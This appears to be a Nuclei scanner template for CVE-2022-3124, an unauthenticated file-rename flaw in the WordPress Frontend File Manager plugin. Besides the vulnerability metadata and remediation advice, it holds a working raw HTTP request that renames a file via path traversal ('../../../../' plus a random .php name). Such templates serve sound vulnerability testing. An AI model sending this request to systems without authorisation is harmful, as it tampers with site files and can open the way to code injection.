id: CVE-2022-3124

info:
  name: Frontend File Manager < 21.3 - Unauthenticated File Renaming
  author: riteshs4hu
  severity: medium
  description: |
    The Frontend File Manager Plugin WordPress plugin before 21.3 allows any unauthenticated user to rename uploaded files from users. Furthermore, due to the lack of validation in the destination filename, this could allow allow them to change the content of arbitrary files on the web server
  impact: |
    Unauthenticated attackers can rename uploaded files and manipulate arbitrary file content on the web server through path traversal, potentially overwriting critical WordPress files or injecting malicious code.
  remediation: |
    Update Frontend File Manager plugin to version 21.3 or later that validates file rename operations and restricts them to authenticated users with proper path validation.
  reference:
    - https://nvd.nist.gov/vuln/detail/CVE-2022-3124
    - https://wpscan.com/vulnerability/00f76765-95af-4dbc-8c37-f1b15a0e8608/
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N
    cvss-score: 5.3
    cve-id: CVE-2022-3124
    cwe-id: CWE-862
    epss-score: 0.08664
    epss-percentile: 0.92606
    cpe: cpe:2.3:a:najeebmedia:frontend_file_manager:*:*:*:*:*:wordpress:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: najeebmedia
    product: frontend_file_manager
    framework: wordpress
    publicwww-query: "/wp-content/plugins/nmedia-user-file-uploader/"
  tags: cve,cve2022,wordpress,wp-plugin,wpscan,nmedia-user-file-uploader,file-upload,intrusive,vkev,vuln

variables:
  rand_string: '{{to_lower(rand_text_alpha(6))}}'

http:
  - raw:
      - |
        POST /wp-json/wpfm/v1/file-rename HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        fileid=1&filename=../../../../{{rand_string}}.php

    matchers-condition: and
    matchers:
      - type: regex
        part: body
        regex:
          - '"fileid"\s*:\s*"([^"]+)"'
          - '"filename"\s*:\s*"([^"]+)"'
        condition: and

      - type: word
        part: content_type
        words:
          - 'application/json'

      - type: status
        status:
          - 200
# digest: 490a004630440220272d186f73a40fb16d6d560316cb54bf7ca9b41fdcd86d6bb0772d7468850bf602207024f2d92394de7e72d5e628fce48aa289c6fb652aff966d8702f9dd8381fe33:922c64590222798bb761d5b6d8e72950